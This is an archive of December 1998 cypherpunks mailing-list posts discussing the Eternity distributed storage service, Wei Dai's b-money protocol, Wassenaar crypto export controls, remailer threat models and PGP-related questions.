> the continued existance of a data.  Throw the lot together and let
> profit maximisation sort the rest out.

There is some window for abuse in this method. It allows a well endowed
entity to bias the information available. There is also the question of data
degredation, in the sense of worth, over time versus the archival/historical
worth of the data. Two major negatives to a free-market approach that are
never discussed.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
 
                                                Howard Zinn


       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 6 Dec 1998 07:24:18 +0800
To: Ryan Lackey <cypherpunks@Algebra.COM
Subject: Re: (eternity) eternity using politics rather than economics
In-Reply-To: <19981205164842.B25348@arianrhod.@>
Message-ID: <19981205150002.B18744@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, Dec 05, 1998 at 04:48:42PM -0400, Ryan Lackey wrote:
> When I was working on Eternity DDS stuff, I basically came to the same
> conclusion as Adam -- without anonymous bearer cash, you can't do
> a workable eternity implementation.

I'm not familiar with the latest eternity designs, but I wonder if they
could be extended to provide a global time ordering between the published
documents? If so perhaps the eternity service can be used to implement
b-money (see http://www.eskimo.com/~weidai/bmoney.txt) and the
chicken and egg problem would be solved at once.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 5 Dec 1998 22:49:55 +0800
To: cypherpunks@toad.com
Subject: Re: What was the quid pro quo for Wassenaar countries?
Message-ID: <0dea998db811e35a157aa07c3d640710@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



"Phillip Hallam-Baker" <hallam@ai.mit.edu> writes

   John Gilmore may be right, but remember folks that in Europe we
   have this thing the Greeks invented called democracy. One of the
   ideas of democracy is that decisions are not made in secret closed
   meetings.

Yes, and people democratically demand government enforcement of the
majority will, something made more difficult if the subjects have
strong cryptography.

As Donn Parker observed several years ago, strong cryptography is
inconsistent with democracy.  (Published in Scientific American ---
reference on request.)

John Gilmore <gnu@toad.com> writes

   Some countries actually seem to care what their citizens think
   about their crypto laws, unlike the shining example of democracy,
   the USSA.  And when we educate the citizens, they tend to make the
   right choices.  Let's keep trying.

But don't educate them too much, or they will understand that
cryptography can set people free, and if people were free there would
be no political government, and if there were no political government
their social security checks would stop coming, along with all their
other government ``benefits''.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sun, 6 Dec 1998 00:00:41 +0800
To: Tim May <tcmay@got.net>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <v0313032eb28e879c5ffe@[209.66.100.75]>
Message-ID: <Pine.BSF.3.96.981205163035.3944A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 4 Dec 1998, Tim May wrote:

 
> On another topic, what of the "free export of crypto" nations? Some
> nations, or folks in some nations, like to talk about how they are actually
> "more free" than Americans are because they can export strong crypto.
> Canada comes to mind, as there are a couple of companies we know about
> using the ostensibly weaker Canadian export controls.
> 
> (I maintain, and Lucky can be my witness that I expressed this forcefully
> to some Canadian entrepreneurs very recently, that Canada's relative
> laxness on crypto arises first, from their ignorance of the issues and
> second, from the fact that Washington hasn't yet told them how high to
> jump. I have long believed the U.S. would issue the orders and other
> countries would turn out to be just as restrictive, if not more
> restrictive, as they have fewer in-country protections against restrictions
> on strong crypto. If Canada, Finland, etc. tighten up, can Anguilla be far
> behind?)

I believe that there will be free havens for crypto for some time to come.
Crypto is too obscure a topic to be outlawed worldwide anytime soon. So
the Canadian entrepreneurs Tim is referring to and others determined to
ship crypto will be able to do so for many, many years by simply
relocating development to other countries.

Just as there are small countries that don't play ball with FINCEN, there
will be small countries that don't play ball with crypto regs and be that
because that's the countries only significant source of hard cash.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@systemics.ai>
Date: Sun, 6 Dec 1998 05:12:07 +0800
To: cypherpunks@Algebra.COM
Subject: eternity using politics rather than economics
Message-ID: <19981205164842.B25348@arianrhod.@>
MIME-Version: 1.0
Content-Type: text/plain



When I was working on Eternity DDS stuff, I basically came to the same
conclusion as Adam -- without anonymous bearer cash, you can't do
a workable eternity implementation.

It's an open question whether you could issue bearer cash backed in
Eternity-units.  That was my original plan, but it seems you would still
want to have gold-units to trade for Eternity units.  The problems of
guaranteeing quality of service in exchange for Eternity units are
complicated but tractable, but having a separate scheme for auditing
performance.

Where I think "political" schemes would be particularly beneficial is 
in sharing administrative control over a virtual corporation, etc.  While
those who believe Coase would believe corporations will devolve into 
individuals or even autonomous agents, it might be a worthwhile tool
during the transition.

As far as I can tell, having a good Eternity implementation is still
blocked on getting a reasonable electronic cash system.  There are
some people in Anguilla...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sinster@darkwater.com
Date: Sun, 6 Dec 1998 09:30:32 +0800
To: cypherpunks@toad.com
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <199812050240.SAA24692@toad.com>
Message-ID: <m0zmSRX-000reGC@scintilla.darkwater.com>
MIME-Version: 1.0
Content-Type: text/plain



Sprach John Gilmore <gnu@toad.com>:
> 	*  And what did NSA offer, to convince many countries to
> 	   directly contradict policies that they had arrived at
> 	   during year-long public consultations with their own citizens?

Call me hopelessly paranoid, but I'm betting that none or nearly none
of the governments in the world want unrestricted crypto.  Hell, I'm
betting that none of the governments in the world are particularly
happy that crypto expertise exists outside of secretive government
research projects and intelligence agencies.  If they could go back to
the secret government-only crypto environment from before and during
WWII, they'd be ecstatic.  Public crypto expertise makes it hard for
governments to keep secrets from each other and their people, it makes
it (relatively) easy for the public to keep secrets from their
government, and in general makes governments REALLY nervous.

Sure, they talked with their people and the people were clear that
_they_ wanted unrestricted crypto.  And so the governments (those few
who actually pay attention to their public) made statements and passed
laws in support of unrestricted crypto... but their arms were being
twisted the whole time, and they were Displeased(tm).

If my statements have any bearing in reality, then it wouldn't take
very much lobbying at all on the NSA's part to convince the wassenaar
countries to change the agreement to restrict or totally ban crypto.
This lets the various governments go back to their people and claim
that they don't have any choice: wassenaar forces them to restrict
crypto... sorry.  The fact that most (almost certainly all) countries
don't act on treaties until (and if) they have passed implementing
legislation is completely lost on the people.  After all, a treaty is
a treaty, right?  It's like a contract between two people, except it's
between countries, right?  So they've agreed: why do we need laws to
implement it?  [I know those last three statements are false, but they
accurately represent the attitudes of all the people with whom I've
discussed the issue of treaty implementation.]

More and more, I see that treaties are no longer tools to create
agreement among governments, but are tools to allow governments to
sidestep the political costs associated with acting against their own
people's express desires.  For a very long time now, it has _appeared_
that European and North American governments agree with each other far
more readily than they agree with their own people.

-- 
Jon Paul Nollmann ne' Darren Senn                      sinster@balltech.net
Unsolicited commercial email will be archived at $1/byte/day.
Dis.Org's propensity for casual violence is little different from that of
any street gang.                                             Carolyn Meinel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Sun, 6 Dec 1998 12:52:59 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: Streams, Voice, and Sensitive Dependence
In-Reply-To: <3668A32C.5954@lsil.com>
Message-ID: <v04003a02b28f84f2cb47@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>On Fri, 4 Dec 1998, Michael Motyka wrote:
>
>>
>> > http://www.starium.com
>> > 14.4 modem, awsome sound quality, 2048 bit DH, 3DES.
>>
>> The web site is pretty sparse. No wonder I couldn't find them before - I
>> was looking for "Starion" a while back. I'll call them next week -
>> they're practically local. What's the approximate price?
>
>The company used to be called Comsec. http://www.comsec.com/ They've
>expanded and are working on the next revision of the product. The old
>version was $750 each. The new version will be a lot less expensive. When
>you call, ask for Eric Blossom. (831) 333-9393  x12

While I was explaining the GSP8191's features to an engineer a few weeks
back he ask whether anyone had thought of how to do secure conferencing via
analog technology. I've never seen such a device. I wonder if such a thing
is practical given the limitations of modem protocols. Certainly one could
use a specialized digital device to join the clear analog channels, but
then you have to all trust this device and that's not been compromised
(anothre MITM).

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 6 Dec 1998 07:20:09 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: DoJ investigates CIA [CNN]
Message-ID: <199812052311.RAA31637@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/US/9812/05/cia.hughes.ap/

>           JUSTICE INVESTIGATING CIA FOR POSSIBLE CRIMINAL VIOLATIONS
>                                        
>    CIA Graphic December 5, 1998
>    Web posted at: 1:38 p.m. EST (1838 GMT)
>    
>    WASHINGTON (AP) -- The Justice Department is conducting an
>    obstruction-of-justice investigation of CIA officials who passed along
>    to a satellite contractor sensitive information about a Senate
>    investigation into technology transfers to China.
>    
>    Government officials reached late Friday said the criminal
>    investigation centers on information passed by the intelligence agency
>    to Hughes Electronics Corp., maker of both commercial and spy
>    satellite systems.
>    
>    At issue is whether that information compromised a Senate Intelligence
>    Committee investigation into allegations that Hughes and other U.S.
>    companies violated federal export laws by sharing restricted
>    technology with China as part of commercial satellite export deals.

[text deleted]


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
 
                                                Howard Zinn


       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 6 Dec 1998 07:39:10 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the shit hitting the fan (fwd)
Message-ID: <199812052331.RAA31810@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 5 Dec 1998 18:13:03 -0500 (EST)
> From: Rabid Wombat <wombat@mcfeely.bsfs.org>
> Subject: Re: the shit hitting the fan (fwd)

> It's during times like these that you learn more about your fellow 
> c'punks than you need to ...

> On Fri, 4 Dec 1998, Jim Choate wrote:
> 
> > Forwarded message:

> > I've gone on long duration camping trips of about a weeks length and the
> > storing and portage costs are not excessive (having a boat or horse helps
> > move it around).

It's not my choice, it's the law (for many national and state parks). You've
got to pach your pets if you take them along as well.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
 
                                                Howard Zinn


       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 6 Dec 1998 07:24:23 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: the shit hitting the fan (fwd)
In-Reply-To: <199812050515.XAA28089@einstein.ssz.com>
Message-ID: <Pine.BSF.3.91.981205181127.18333B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



It's during times like these that you learn more about your fellow 
c'punks than you need to ...


On Fri, 4 Dec 1998, Jim Choate wrote:

> Forwarded message:
> 
> > Date: Sat, 5 Dec 1998 06:00:13 +0100
> > From: Anonymous <nobody@replay.com>
> > Subject: the shit hitting the fan
> 
> > At 02:48 PM 12/4/98 -0600, Igor Chudov @ home wrote:
> > >Even flushing toilets is not necessary as anyone can shit outside.
> > >
> > >I am speaking out of personal experiences, living with water outages
> > >while we were in the Russian countryside. It was no big deal, period.
> > 
> > Moron.  At a low population density you can do anything, burn wood, leaded
> > gas,
> > etc., no problem.
> > 
> > LA has 1e7 people who shit about a kilo per day.  Compute the volume of that
> > after a week.
> 
> It's not the raw volume that's critical but rather the percentage of the
> average personal space per inhabitant versus how much to store a weeks
> worth. For the average person storing a weeks worth of solid waste in a
> platic bag with bleach, lye, or similar material is reasonable.
> 
> I've gone on long duration camping trips of about a weeks length and the
> storing and portage costs are not excessive (having a boat or horse helps
> move it around).
> 
> 
>     ____________________________________________________________________
>  
>              Technology cannot make us other than what we are.
> 
>                                            James P. Hogan
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sun, 6 Dec 1998 08:35:07 +0800
To: cypherpunks@manifold.algebra.com
Subject: explanation of public key cryptography
Message-ID: <199812060014.SAA02652@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



My friend needs a website with explanations of PK cryptography
and related interesting protocols. I have Schneier's book but she
lives far from me and the book is too long for her to read.

Any suggestions for something on the Web?

thanks

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 6 Dec 1998 01:56:17 +0800
To: cypherpunks@toad.com
Subject: ..
Message-ID: <199812051730.SAA20180@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> > (Furthermore, most remailer structures still can't erase some other security
> > concerns --
> >   1: remailers acutally can be hacked or physically compromised
> >   2: clients really can be screwed
> >   3: etc.
> > 
> > To help solve the first, you'd want a two-box setup doing remailing, with the
> > security-critical stuff loaded on a box not directly connected to the Net with
> > something 140-1ish to make tampering harder, a secure OS, etc. -- or, of
> > course, you can scrap all that to get really big remailer count.
> 
> As long as you do not see the box and do not control its manufacture,
> I see no reason why you should have ny more trust in it.

Well, you shouldn't have complete trust -- a tamper-resistant net could be
compromised, too -- but there's a good reason to have more trust in it than in
the existing one. More on that after a parenthetical remark.

(This brings up the "hardware web-of-trust" issue; you can set up such a web
with trusted spot-checkers and statistical/cryptographic means of assuring the
user that the box works as advertised, if your threat model demands it.  
There's more about it in the "Beyond Class (A1)" section of the Orange Book,
although the section's use to Cypherpunk types is limited because it's written
without any thought to, say, doing things cheaply or having a decentralized
setup.)

The tamper-resistance simply means that if the mailer was set up secure, it's
not going to become compromised. Instead of having to trust that one of the
remailer operators is currently honest and has always done all the necessary
homework to ensure the system was safe, you have to trust that this entity was
honest and diligent when the remailer was set up (unless, of course, you think
the tamper-resistance was circumvented); if the operator is bribed after the
remailer's set up and the public key is published, there's no way to suddenly
and invisibly make messages traceable, as there is in a "normal" Mixmaster
remailer.

(This is because, given the normal assumptions about crypto strength, it takes
the remailer's private key to process a Mixmaster-like packet and that key is
generated by and stays within the tamper-resistant box)

My predictions about the biggest attacks on a tamper-resistant remailer net:
  1: traffic analysis. Until the net structure is overhauled, this will always
     be possible.
  2: propagation and exploitation of faulty server software. Related to the
     whole web-of-trust issue.
  3: direct attacks on specific clients. Again, no web of trust.
  4: creation of bad remailers and attempts to shut down good ones. More
     messages could be traced in a world with 6 good and 47 bad remailers than
     in one with 9 good and 3 bad.
  5: direct attacks on new remailers
  6: attempts to make an operator feign a catastrophe and set up a new,
     compromised remailer. Users, however, would know that the new key not 
     signed by an old one means that they must now trust that the remailer was
     not compromised before the publication of the new key.
  7: attacks on tamper resistance
...
  n: attacks on crypto
n+1: etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 6 Dec 1998 10:13:16 +0800
To: ukcrypto@maillist.ox.ac.uk
Subject: a strategy
Message-ID: <3669E17D.14FF@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

I just read the most recent AFTER MONTHS of nothing happening.

http://jya.com/a6e.htm

Love it.

Can you possibly get suspected terrorists on your landlord's case?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sun, 6 Dec 1998 02:32:35 +0800
To: cypherpunks@Algebra.COM
Subject: pgp disk
Message-ID: <fb4d35c7250a01fc0610606c695e3e20@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>At 03:05 AM 12/5/98 +0100, Anonymous wrote about some new product:
>>If the source code isn't available, don't trust it. That's a good general
>>rule.
>
>
>Where is the source for pgpfone?

Good question. That's why I wouldn't use it either. (I haven't had reason to
use it, so 'll take Anonymous's word that source isn't available.)

If people want to release software like this, they need a better argument
for its security than "Trust us, it's secure." 

Considering that there is no net loss when developers of such a product
release source code so that people can look it over and compile it
themselves, I don't have any reason to trust such software.

Aren't McAfee and PGP Inc. members of KRAP and promoting Big Brother Inside?
I've lost track.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 6 Dec 1998 03:55:11 +0800
To: eternity@internexus.net
Subject: (fwd) Markus Kuhn on eternity
Message-ID: <199812051932.TAA12539@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Markus Kuhn (on ukcrypto) discussing his PhD project: the design of an
eternity file system with a distributed administration function system
controlled via a cryptographically enforced digital constitution.

Comments to follow.

Adam

======================================================================
To: ukcrypto@maillist.ox.ac.uk
Subject: Re: intangible definitions are hard to pin down 
Date: Thu, 19 Nov 1998 16:28:21 +0000
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>

Ben Laurie wrote on 1998-11-19 12:22 UTC:
> Ross Anderson wrote:
> > It will get worse. One of my students is developing a file system that
> > can be spread over a WAN, so that for example you can force all file
> > modifications in directory foo to be backed up automatially using a
> > kind of RCS at a server in America. Useful stuff - real businesses are
> > much more interested in backup and disaster recovery than they are in
> > crypto (and spend a couple of orders of magnitude more money). But how
> > does this sort of system interact with export control?
> 
> Cool - is this going to be open source?

Of course.

> Presumably, even though, as you
> say, businesses are less interested in crypto, it will, nevertheless,
> use crypto for data protection and user authentication?

Of course.

The main research aspect of this project is the joint administration of
such distributed archives. For spam protection, you still need people
who decide, which files are allowed on the distributed server
infrastructure, and which are not. This administration is so far the
weak link in the Eternity Service concept, because whoever decides that
something is not spam takes over some responsibility for the content,
and is therefore subject to legal power of national powers.

The distributed administration in my system will be controlled via a
sort of cryptographically enforced digital constitution (written in a
tiny special purpose functional programming language) that determines
administrative rights in a freely configurable way for a distributed
server architecture (allowing elections, votes, vetoes, impeachment,
updates to the constitution, etc.). This way, no single person will be
responsible for the maintenance of such international software
repositories, but a (usually international) group of democratically
controlled volunteers does this. This way, US people can easily
contribute to the administration of such distributed archives without
having to share any legal responsibility for the fact that the archive
also contains export controlled software, because the majority of
administrators and not some single citizen alone has decided which files
are allowed to use server space.

The goal of this project is of course not primarily to by-pass export
controls. It will hopefully advance the state-of-the-art of how we use
the Internet to distribute information to a point where classical export
control laws and national control of Internet content in general are led
completely ad absurdum, without enabling at the same time the wide
distribution and robust long-term storage of commonly considered
despicable material such as child pornography, instructions for building
weapons of mass destruction, or unwanted commercial advertising. In
fact, by providing easy to configure governmental mechanisms comparable
to those national governments are based on for software repositories, we
distribute the responsibility in a cryptographically enforced way over
the thousands or millions of users of such archives, effectively
bypassing any control of national governments, without the negative
aspects of complete anarchy (spam).

To avoid misunderstandings: the ultimate idea is not to just by-pass
national laws, but to offer a productive and democratic alternative
technical means for controlling online resources, because the classical
options of either national legislation and complete anarchy both have
serious problems.

Markus
(Ross' student, who tries to get a PhD for developing a theoretical
foundation and practical implementation of global-scale jointly
administrated file spaces)

-- 
Markus G. Kuhn, Computer Laboratory, University of Cambridge, UK
Email: mkuhn at acm.org,  WWW: <http://www.cl.cam.ac.uk/~mgk25/>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 6 Dec 1998 03:55:55 +0800
To: cypherpunks@cyberpass.net
Subject: Wei Dei's "b-money" protocol
Message-ID: <199812051937.TAA12780@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Wei Dei recently announced (on cypherpunks) his "b-money, a new
protocol for monetary exchange and contract enforcement for
pseudonyms".

Below is the text of his proposal.

Comments to follow.

Adam

======================================================================
http://www.eskimo.com/~weidai/bmoney.txt
======================================================================

I am fascinated by Tim May's crypto-anarchy. Unlike the communities
traditionally associated with the word "anarchy", in a crypto-anarchy the
government is not temporarily destroyed but permanently forbidden and
permanently unnecessary. It's a community where the threat of violence is
impotent because violence is impossible, and violence is impossible
because its participants cannot be linked to their true names or physical
locations.

Until now it's not clear, even theoretically, how such a community could
operate. A community is defined by the cooperation of its participants,
and efficient cooperation requires a medium of exchange (money) and a way
to enforce contracts. Traditionally these services have been provided by
the government or government sponsored institutions and only to legal
entities. In this article I describe a protocol by which these services
can be provided to and by untraceable entities.

I will actually describe two protocols. The first one is impractical,
because it makes heavy use of a synchronous and unjammable anonymous
broadcast channel. However it will motivate the second, more practical
protocol. In both cases I will assume the existence of an untraceable
network, where senders and receivers are identified only by digital
pseudonyms (i.e. public keys) and every messages is signed by its sender
and encrypted to its receiver.

In the first protocol, every participant maintains a (seperate) database
of how much money belongs to each pseudonym. These accounts collectively
define the ownership of money, and how these accounts are updated is the
subject of this protocol.

1. The creation of money. Anyone can create money by broadcasting the
solution to a previously unsolved computational problem. The only
conditions are that it must be easy to determine how much computing effort
it took to solve the problem and the solution must otherwise have no
value, either practical or intellectual. The number of monetary units
created is equal to the cost of the computing effort in terms of a
standard basket of commodities. For example if a problem takes 100 hours
to solve on the computer that solves it most economically, and it takes 3
standard baskets to purchase 100 hours of computing time on that computer
on the open market, then upon the broadcast of the solution to that
problem everyone credits the broadcaster's account by 3 units.

2. The transfer of money. If Alice (owner of pseudonym K_A) wishes to
transfer X units of money to Bob (owner of pseudonym K_B), she broadcasts
the message "I give X units of money to K_B" signed by K_A. Upon the
broadcast of this message, everyone debits K_A's account by X units and
credits K_B's account by X units, unless this would create a negative
balance in K_A's account in which case the message is ignored.

3. The effecting of contracts. A valid contract must include a maximum
reparation in case of default for each participant party to it. It should
also include a party who will perform arbitration should there be a
dispute. All parties to a contract including the arbitrator must broadcast
their signatures of it before it becomes effective. Upon the broadcast of
the contract and all signatures, every participant debits the account of
each party by the amount of his maximum reparation and credits a special
account identified by a secure hash of the contract by the sum the maximum
reparations. The contract becomes effective if the debits succeed for
every party without producing a negative balance, otherwise the contract
is ignored and the accounts are rolled back. A sample contract might look
like this:

K_A agrees to send K_B the solution to problem P before 0:0:0 1/1/2000.
K_B agrees to pay K_A 100 MU (monetary units) before 0:0:0 1/1/2000. K_C
agrees to perform arbitration in case of dispute. K_A agrees to pay a
maximum of 1000 MU in case of default. K_B agrees to pay a maximum of 200
MU in case of default. K_C agrees to pay a maximum of 500 MU in case of
default.

4. The conclusion of contracts. If a contract concludes without dispute,
each party broadcasts a signed message "The contract with SHA-1 hash H
concludes without reparations." or possibly "The contract with SHA-1 hash
H concludes with the following reparations: ..." Upon the broadcast of all
signatures, every participant credits the account of each party by the
amount of his maximum reparation, removes the contract account, then
credits or debits the account of each party according to the reparation
schedule if there is one.

5. The enforcement of contracts. If the parties to a contract cannot agree
on an appropriate conclusion even with the help of the arbitrator, each
party broadcasts a suggested reparation/fine schedule and any arguments or
evidence in his favor. Each participant makes a determination as to the
actual reparations and/or fines, and modifies his accounts accordingly.

In the second protocol, the accounts of who has how much money are kept by
a subset of the participants (called servers from now on) instead of
everyone. These servers are linked by a Usenet-style broadcast channel.
The format of transaction messages broadcasted on this channel remain the
same as in the first protocol, but the affected participants of each
transaction should verify that the message has been received and
successfully processed by a randomly selected subset of the servers.

Since the servers must be trusted to a degree, some mechanism is needed to
keep them honest. Each server is required to deposit a certain amount of
money in a special account to be used as potential fines or rewards for
proof of misconduct. Also, each server must periodically publish and
commit to its current money creation and money ownership databases. Each
participant should verify that his own account balances are correct and
that the sum of the account balances is not greater than the total amount
of money created. This prevents the servers, even in total collusion, from
permanently and costlessly expanding the money supply. New servers can
also use the published databases to synchronize with existing servers.

The protocol proposed in this article allows untraceable pseudonymous
entities to cooperate with each other more efficiently, by providing them
with a medium of exchange and a method of enforcing contracts. The
protocol can probably be made more efficient and secure, but I hope this
is a step toward making crypto-anarchy a practical as well as theoretical
possibility.

======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 6 Dec 1998 05:00:21 +0800
To: eternity@internexus.net
Subject: (eternity) democracy is a bad idea on the net too!
In-Reply-To: <199812051932.TAA12539@server.eternity.org>
Message-ID: <199812052026.UAA12863@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Markus Kuhn wrote:
> The main research aspect of this project is the joint administration of
> such distributed archives. For spam protection, you still need people
> who decide, which files are allowed on the distributed server
> infrastructure, and which are not. 

I think a better deciding factor of which files remain and which don't
is hard, anonymous ecash.  Allow the author, or server to charge for
storage, and charge for access.  Allow readers to contribute ecash to
the continued existance of a data.  Throw the lot together and let
profit maximisation sort the rest out.

> This administration is so far the weak link in the Eternity Service
> concept, because whoever decides that something is not spam takes
> over some responsibility for the content, and is therefore subject
> to legal power of national powers.

Anonymous ecash leaves noone (identifiable) deciding anything, just
people paying for encrypted secret split data to be stored and for
encrypted data to be transmitted.

> The distributed administration in my system will be controlled via a
> sort of cryptographically enforced digital constitution (written in a
> tiny special purpose functional programming language) that determines
> administrative rights in a freely configurable way for a distributed
> server architecture (allowing elections, votes, vetoes, impeachment,
> updates to the constitution, etc.).

Wew.  Re-inventing democracy and all the problems that go with in the
electronic world!  Sounds like this will re-invent `the tyranny of the
majority' syndrome.

I would prefer to see this kind imposition of majority views
considered a subscriber filtering service ontop of the document space.
This is then a canonicalization of the comment that "if you don't like
reading X, then don't read it!".  And also eternity itself is an
attempt to provide an efficient implemention, with cryptographic
assurance, of John Gilmore's quote "The 'net views censorship as
damage and routes around it".

To give an example, subscriber group X, let us say hard line muslims
(no images of females exposing any part of their body) choose to set
up an approved "view" (in the database sense) of the documents the
eternity distributed database then anyone who chooses can subscribe to
this view, fund it, vote in it's constitution (or sit passively in
it's dictatorship) as they see fit.  Similarly anyone is free to set
up their own, new filtering services, or to use no filtering service
at all!

Possibly this is the way you view the filtering service too, though if
this is the case I would suggest use of language such as "filter out"
in place of "delete", as delete suggests that someone or several
someones under a democratic constitution (or any other expressible
voting scheme) are able to prevent others from paying for the
distribution of data of interest only to a minority.

> This way, no single person will be responsible for the maintenance
> of such international software repositories, but a (usually
> international) group of democratically controlled volunteers does
> this. This way, US people can easily contribute to the
> administration of such distributed archives without having to share
> any legal responsibility for the fact that the archive also contains
> export controlled software, because the majority of administrators
> and not some single citizen alone has decided which files are
> allowed to use server space.

I think a better solution to the problem of an identitifiable
individual being viewed (by governments) as responsible for the
existance of a document is anonymity.  That way, the factions of the
US government interested in controlling bit-flow don't know who
submitted the document, nor who voted with hard ecash to keep it
there.

> without enabling at the same time the wide distribution and robust
> long-term storage of commonly considered despicable material such as
> child pornography, instructions for building weapons of mass
> destruction, or unwanted commercial advertising.

I don't think this is possible, or advisable even.  Cash is a better
metric of interest in data, trying to think in other terms just means
someone else will make the money.  John Gilmore's quote in monetary
terms.

The question is whether one believes in unconditional free speech or
not.

I suggest that those who believe in conditional free speech would be
wrong if their belief led them to try to deprive others of
unconditional free speech rather than setting up and subscribing along
other like-minded types to filtering services.

The muslims in the example above may view images of females showing
their faces as extreme heresy, worthy of the death penalty.  One has
to accomodate differing views of what is acceptable.  There is no
world view on what is acceptable, therefore I propose that a better
solution is to consider filtering.  The existance of data does not
hurt people.  People who object to the availability of data are
advocating the creation of `thought crime'.

> In fact, by providing easy to configure governmental mechanisms
> comparable to those national governments are based on for software
> repositories, we distribute the responsibility in a
> cryptographically enforced way over the thousands or millions of
> users of such archives, effectively bypassing any control of
> national governments, without the negative aspects of complete
> anarchy (s**m).

Filtering and rating services can provide an effective method of
avoiding reading data one is uninterested in.  If someone else is
interested enough in the availability of data to pay ecash to ensure
it's availability why would anyone else be interested to prevent this.

In a straight-forward translation of the voting scheme to monetary
voting, we might if we were not careful result in a system where
others (censors) are able to cast negative monetary votes by paying
servers not to distribute certain bit strings.  I think an eternity
system should view this as a cryptographic attack to be designed
around.  Design the system so that the server can not be bribed to not
distribute certain data by dint of not being able to recognise it.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 6 Dec 1998 04:37:12 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812052012.VAA32710@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry for all the questions but I've been
away from crypto for a while and I'm
looking for the best encryption program
for exchanging email between Unix and
Windows folks. I hope these questions are
appropriate here.

What do people generally think about S/MIME ?
Is it well designed (strong and extendable) ?
Is it convenient because its available in
the popular email clients ?
Is the most annoying thing about it that
you have to pay for the keys ?
Is there a way to self-sign keys ? SSLeay ?
Are most people still using PGP ?
If IDEA and MD5 (and PGP2.6.2) are not strong
enough anymore, what are the Unix folks
using ? Does the source for PGP5/6 compile
to any target besides Windoze ?

Thanks





